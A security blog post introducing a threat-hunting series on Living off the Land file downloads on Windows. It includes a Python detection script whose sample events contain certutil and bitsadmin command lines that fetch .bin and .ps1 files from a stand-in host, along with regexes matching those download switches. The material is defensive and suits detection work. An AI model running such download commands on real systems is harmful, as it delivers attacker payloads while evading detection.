Living off the Land (LotL) – Downloading Files on Microsoft Windows

Austin Jackson|March 9, 2021

Cyborg Security is starting an exciting new series of threat hunting videos dedicated to the practice of Living off the Land (LotL)!


Living off the Land (LotL) refers to threat actor behavior in which the attacker uses tools and resources that are readily available in the compromised environment. Threat actors gain several advantages from this methodology. First, by utilizing pre-installed tools, they decrease their likelihood of detection. Second, they minimize their operational need to bring additional tools onto a target system. Lastly, by using those toolsets, the actors can help confound attribution efforts.


These videos will focus on the common tactics, techniques, and procedures (TTPs) threat actors use to remain undetected in an environment. The video series will introduce the TTPs, explore how actors use them, and show what organizations can do to detect this activity in their environment.

In the first part of this new series, we are taking a look at living off the land techniques for downloading remote files on Microsoft Windows. There is a plethora of different tools and binaries that can download remote files on Microsoft Windows. BITSAdmin and CertUtil come pre-installed on all Microsoft Windows systems and are some of the tools threat actors most commonly use for this purpose. Check out the video below to learn more about these tools and how to hunt for them!
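One way to hunt for the BITSAdmin and CertUtil download activity described above, as an added example that is not Cyborg Security's code and is not taken from the video. It assumes process-creation telemetry with Sysmon Event ID 1 field names; the `hunt` and `tool_name` helpers, the switches matched, and the sample events are constructed for illustration.

```python
import ntpath
import re

URL_RE = re.compile(r'(?i)\b(?:https?|ftp)://[^\s"]+')
# Switches that make each built-in tool fetch remote content (assumed hunt scope).
DOWNLOAD_SWITCHES = {
    "certutil.exe": re.compile(r"(?i)(?:^|\s)[-/]urlcache\b"),
    "bitsadmin.exe": re.compile(r"(?i)(?:^|\s)/(?:transfer|addfile)\b"),
}

# Constructed process-creation records (Sysmon Event ID 1 field names), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.test/a.bin C:\Users\Public\a.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -hashfile C:\Temp\setup.msi SHA256"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high https://example.test/b.ps1 C:\Temp\b.ps1"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "bitsadmin /list /allusers"},
    {"Image": r"C:\Users\Public\cu.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cu.exe /urlcache /f http://example.test/c.dat c.dat"},
]

def tool_name(event):
    """Prefer the PE OriginalFileName so a renamed copy of the tool is still recognised."""
    name = event.get("OriginalFileName") or ntpath.basename(event.get("Image", ""))
    return name.lower()

def hunt(events):
    """Return one finding per event where BITSAdmin or CertUtil is run with a download switch."""
    hits = []
    for ev in events:
        tool = tool_name(ev)
        pattern = DOWNLOAD_SWITCHES.get(tool)
        cmd = ev.get("CommandLine", "")
        if pattern and pattern.search(cmd):
            hits.append({
                "tool": tool,
                "urls": URL_RE.findall(cmd),
                "parent": ntpath.basename(ev.get("ParentImage", "")).lower(),
                "renamed": ntpath.basename(ev.get("Image", "")).lower() != tool,
            })
    return hits
```

Routine uses such as hashing a file or listing BITS jobs are not flagged, and the `renamed` field marks a copy of the tool run under another file name.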

 


Austin Jackson

Software Engineer & Security Researcher